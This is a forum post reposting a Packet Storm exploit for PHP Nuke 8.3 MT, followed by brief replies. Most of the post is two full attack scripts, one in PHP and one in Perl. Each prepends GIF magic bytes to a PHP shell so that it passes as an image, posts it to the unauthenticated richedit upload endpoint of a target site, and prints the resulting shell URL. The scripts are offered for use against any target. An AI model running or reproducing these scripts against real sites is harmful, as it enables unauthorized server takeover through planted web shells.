PHP Nuke 8.3 MT Shell Upload

Zatarra · June 23, 2011

PHP exploit:


<?php /////////////////////////////////////////////////// #Iranian Pentesters Home #PHP Nuke 8.3 MT AFU Vulnerability #Coded by:4n0nym0us & b3hz4d #http://www.pentesters.ir /////////////////////////////////////////////////// //Settings: $address = 'http://your-target.com'; $file = 'shell.php.01'; $prefix='pentesters_';   //Exploit: @$file_data = "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00"; @$file_data .= file_get_contents($file); file_put_contents($prefix . $file, $file_data); $file = $prefix . $file; echo "\n" . "///////////////////////////////////" ."\n"; echo "     Iranian Pentesters Home" . "\n"; echo " PHP Nuke 8.3 MT RFU Vulnerability" . "\n"; echo "///////////////////////////////////" ."\n"; $address_c = $address . '/includes/richedit/upload.php'; $postdata = array("userfile" => "@$file;type=image/gif","upload" => "1","path" => "images","pwd" => "1"); $data =  post_data($address_c, $postdata); $start = strpos($data, "<img src=\"upload"); if ($start != null) { $data = substr($data,$start + 10); $end = strpos($data, "\""); $data = substr($data,0,$end); echo "\n" . "Uploaded File: " . $address . "/includes/richedit/" . $data . "\n"; } else echo "\n" . "Upload Failed!!!"; function post_data($address, $data) {     $curl = curl_init($address);     curl_setopt($curl, CURLOPT_USERAGENT, "Opera/9.0 (Windows NT 5.0; U; en)");     curl_setopt($curl, CURLOPT_POST, 1);     curl_setopt($curl, CURLOPT_POSTFIELDS, $data);     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);     curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);     $content = curl_exec($curl);     curl_close($curl);     return $content; } ?>

PERL exploit


#!/usr/bin/perl ################################################### #//Iranian Pentesters Home #//PHP Nuke 8.3 MT AFU Vulnerability #//Coded by:4n0nym0us & b3hz4d #//http://www.pentesters.ir ###################################################   use LWP; use HTTP::Request::Common; print "\n" . "///////////////////////////////////" ."\n"; print "     Iranian Pentesters Home" . "\n"; print " PHP Nuke 8.3 MT AFU Vulnerability" . "\n"; print "///////////////////////////////////" ."\n"; print "\n" . "Syntax: perl xpl.pl http://your-target.com shell.php.01 [prefix]" . "\n\n"; my $url   = $ARGV[0]."/includes/richedit/upload.php"; my $filename = $ARGV[1]; my $prefix = $ARGV[2]; my $rfile = $prefix . $filename . ".gif"; open fhandle, $ARGV[1] or die $!;  while (<fhandle>){ $shell .= $_; } close fhandle; open fhandle, ">", $rfile or die $!; print fhandle "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00"."\n".$shell; close(fhandle); my $ua = LWP::UserAgent->new; $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.12) Gecko/20101026"); my $req = POST $url, Content_Type => 'form-data',     Content      => [         upload => "1",         path => 'images',         pwd => "1",         userfile =>  [ $rfile,$prefix . $filename ]     ]; my $res = $ua->request($req); $between=substr($res->as_string(), index($res->as_string(), '<img src="upload/')+10, index($res->as_string(), 'onclick="self.parent.') - index($res->as_string(), '<img src="upload/')-12); print("Uploaded File: " . $ARGV[0]."/includes/richedit/".$between); exit;

Sursa: PHP Nuke 8.3 MT Shell Upload ? Packet Storm

Video: Download - 213.mp4 - Persiangig

June 23, 2011

Thanks bro

orion.hacker · August 15, 2011

nu mai merge:(

pr00f · August 15, 2011

nu mai merge:(

Fiindc?-i de ~ dou? luni exploit-ul .

Sign In

PHP Nuke 8.3 MT Shell Upload

Recommended Posts

Zatarra

Guest expl0iter

orion.hacker

pr00f

Join the conversation

Browse

Activity

Pages